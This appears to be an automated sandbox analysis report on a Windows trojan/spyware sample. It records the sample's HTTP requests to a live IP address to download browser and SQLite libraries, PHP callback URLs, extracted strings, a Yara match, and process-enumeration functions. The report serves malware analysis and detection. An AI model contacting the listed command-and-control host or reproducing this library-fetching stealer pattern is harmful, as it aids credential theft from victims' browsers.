Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache

Source: unknown

Source: file.exe, 00000000.00000002.2364033932.00000000007AB000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2365609973.00000000013EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2365609973.0000000001449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2365609973.0000000001449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dll
Source: file.exe, 00000000.00000002.2365609973.0000000001449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dll
Source: file.exe, 00000000.00000002.2365609973.0000000001449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dll
Source: file.exe, 00000000.00000002.2365609973.0000000001449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dlld
Source: file.exe, 00000000.00000002.2365609973.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2365609973.000000000147F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll
Source: file.exe, 00000000.00000002.2365609973.0000000001449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll3
Source: file.exe, 00000000.00000002.2365609973.0000000001449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dllt
Source: file.exe, 00000000.00000002.2365609973.0000000001449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll
Source: file.exe, 00000000.00000002.2365609973.0000000001449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dllH
Source: file.exe, 00000000.00000002.2365609973.0000000001449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dll
Source: file.exe, 00000000.00000002.2365609973.0000000001449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll
Source: file.exe, 00000000.00000002.2365609973.0000000001449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dlll
Source: file.exe, 00000000.00000002.2365609973.000000000147F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2365609973.000000000147F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php3
Source: file.exe, 00000000.00000002.2365609973.000000000147F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php5.c
Source: file.exe, 00000000.00000002.2365609973.0000000001449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php6
Source: file.exe, 00000000.00000002.2365609973.0000000001449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpE
Source: file.exe, 00000000.00000002.2365609973.000000000147F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpHAR)
Source: file.exe, 00000000.00000002.2365609973.0000000001449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpN
Source: file.exe, 00000000.00000002.2365609973.0000000001449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpR
Source: file.exe, 00000000.00000002.2365609973.0000000001433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpb
Source: file.exe, 00000000.00000002.2365609973.000000000147F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpf
Source: file.exe, 00000000.00000002.2365609973.000000000147F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpq
Source: file.exe, 00000000.00000002.2364033932.00000000007AB000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phption:
Source: file.exe, 00000000.00000002.2365609973.0000000001465000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpwser
Source: file.exe, 00000000.00000002.2365609973.0000000001449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/s
Source: file.exe, 00000000.00000002.2365609973.00000000013EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37R
Source: file.exe, 00000000.00000002.2364033932.00000000007AB000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37e2b1563c6670f193.phption:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.2392162329.000000006C6CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2380999461.000000001D6F6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2392021959.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: file.exe, 00000000.00000003.2205400256.00000000014A9000.00000004.00000020.00020000.00000000.sdmp, GCBGCGHD.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.2386656748.00000000297CB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2365609973.000000000147F000.00000004.00000020.00020000.00000000.sdmp, BKFBAECBAEGDGDHIEHIJ.0.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: file.exe, 00000000.00000002.2386656748.00000000297CB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2365609973.000000000147F000.00000004.00000020.00020000.00000000.sdmp, BKFBAECBAEGDGDHIEHIJ.0.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: file.exe, 00000000.00000003.2205400256.00000000014A9000.00000004.00000020.00020000.00000000.sdmp, GCBGCGHD.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2205400256.00000000014A9000.00000004.00000020.00020000.00000000.sdmp, GCBGCGHD.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2205400256.00000000014A9000.00000004.00000020.00020000.00000000.sdmp, GCBGCGHD.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.2386656748.00000000297CB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2365609973.000000000147F000.00000004.00000020.00020000.00000000.sdmp, BKFBAECBAEGDGDHIEHIJ.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000002.2386656748.00000000297CB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2365609973.000000000147F000.00000004.00000020.00020000.00000000.sdmp, BKFBAECBAEGDGDHIEHIJ.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: file.exe, 00000000.00000003.2205400256.00000000014A9000.00000004.00000020.00020000.00000000.sdmp, GCBGCGHD.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2205400256.00000000014A9000.00000004.00000020.00020000.00000000.sdmp, GCBGCGHD.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2205400256.00000000014A9000.00000004.00000020.00020000.00000000.sdmp, GCBGCGHD.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: BKFBAECBAEGDGDHIEHIJ.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: FIJJKECFCFBGDHIECAAFIIDAKK.0.dr	String found in binary or memory: https://support.mozilla.org
Source: FIJJKECFCFBGDHIECAAFIIDAKK.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: FIJJKECFCFBGDHIECAAFIIDAKK.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: file.exe, 00000000.00000002.2386656748.00000000297CB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2365609973.000000000147F000.00000004.00000020.00020000.00000000.sdmp, BKFBAECBAEGDGDHIEHIJ.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: file.exe, 00000000.00000002.2386656748.00000000297CB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2365609973.000000000147F000.00000004.00000020.00020000.00000000.sdmp, BKFBAECBAEGDGDHIEHIJ.0.dr	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000003.2205400256.00000000014A9000.00000004.00000020.00020000.00000000.sdmp, GCBGCGHD.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.2205400256.00000000014A9000.00000004.00000020.00020000.00000000.sdmp, GCBGCGHD.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: FIJJKECFCFBGDHIECAAFIIDAKK.0.dr	String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.2364033932.000000000063A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: FIJJKECFCFBGDHIECAAFIIDAKK.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: file.exe, 00000000.00000002.2364033932.000000000063A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: FIJJKECFCFBGDHIECAAFIIDAKK.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000002.2364033932.000000000063A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000002.2364033932.000000000063A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/80x1024
Source: file.exe, 00000000.00000003.2303212760.000000002F859000.00000004.00000020.00020000.00000000.sdmp, FIJJKECFCFBGDHIECAAFIIDAKK.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: FIJJKECFCFBGDHIECAAFIIDAKK.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.2303212760.000000002F859000.00000004.00000020.00020000.00000000.sdmp, FIJJKECFCFBGDHIECAAFIIDAKK.0.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000002.2364033932.000000000063A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.2303212760.000000002F859000.00000004.00000020.00020000.00000000.sdmp, FIJJKECFCFBGDHIECAAFIIDAKK.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: file.exe, 00000000.00000002.2364033932.000000000063A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
Source: file.exe, 00000000.00000002.2364033932.000000000063A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/vRm9ybXxwbmxjY21vamNtZW9obHBnZ21mbmJiaWFwa21ibGlvYnwxfDB8MHx

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.file.exe.60bbc8.1.raw.unpack, type: UNPACKEDPE

Matched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Contains functionality to call native functions

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6BB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,

0_2_6C6BB700

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF	0_2_009B48CF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009AE019	0_2_009AE019
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B885A	0_2_009B885A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A7686C	0_2_00A7686C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A3E855	0_2_00A3E855
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009A493F	0_2_009A493F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00936166	0_2_00936166
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0086427B	0_2_0086427B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009E4399	0_2_009E4399
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B13B9	0_2_009B13B9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008823BF	0_2_008823BF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B9BF1	0_2_009B9BF1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00940CC2	0_2_00940CC2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00969C0B	0_2_00969C0B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B6436	0_2_009B6436
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008CB476	0_2_008CB476
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B2DDF	0_2_009B2DDF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6535A0	0_2_6C6535A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C665440	0_2_6C665440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C545C	0_2_6C6C545C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C542B	0_2_6C6C542B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6CAC00	0_2_6C6CAC00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C695C10	0_2_6C695C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A2C10	0_2_6C6A2C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65D4E0	0_2_6C65D4E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C696CF0	0_2_6C696CF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6664C0	0_2_6C6664C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67D4D0	0_2_6C67D4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B34A0	0_2_6C6B34A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BC4A0	0_2_6C6BC4A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C666C80	0_2_6C666C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66FD00	0_2_6C66FD00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67ED10	0_2_6C67ED10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C680512	0_2_6C680512
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B85F0	0_2_6C6B85F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C690DD0	0_2_6C690DD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C6E63	0_2_6C6C6E63
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65C670	0_2_6C65C670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A2E4E	0_2_6C6A2E4E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C674640	0_2_6C674640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C679E50	0_2_6C679E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C693E50	0_2_6C693E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B9E30	0_2_6C6B9E30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A5600	0_2_6C6A5600
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C697E10	0_2_6C697E10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C76E3	0_2_6C6C76E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65BEF0	0_2_6C65BEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66FEF0	0_2_6C66FEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B4EA0	0_2_6C6B4EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BE680	0_2_6C6BE680
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C675E90	0_2_6C675E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C669F00	0_2_6C669F00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C697710	0_2_6C697710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65DFE0	0_2_6C65DFE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C686FF0	0_2_6C686FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A77A0	0_2_6C6A77A0

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 005E45C0 appears 316 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C68CBE8 appears 58 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C6994D0 appears 46 times

Sample file is different than original file name gathered from version info

Source: file.exe, 00000000.00000002.2392510564.000000006C8D5000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2392235915.000000006C6E2000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 0.2.file.exe.60bbc8.1.raw.unpack, type: UNPACKEDPE

Source: file.exe

Static PE information: Section: whlvtsns ZLIB complexity 0.9947847098545562

Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/23@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005F9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_005F9600

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005F3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_005F3720

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\NW8JK5UG.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2380999461.000000001D6F6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2391962093.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2392418682.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2380999461.000000001D6F6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2391962093.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2392418682.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
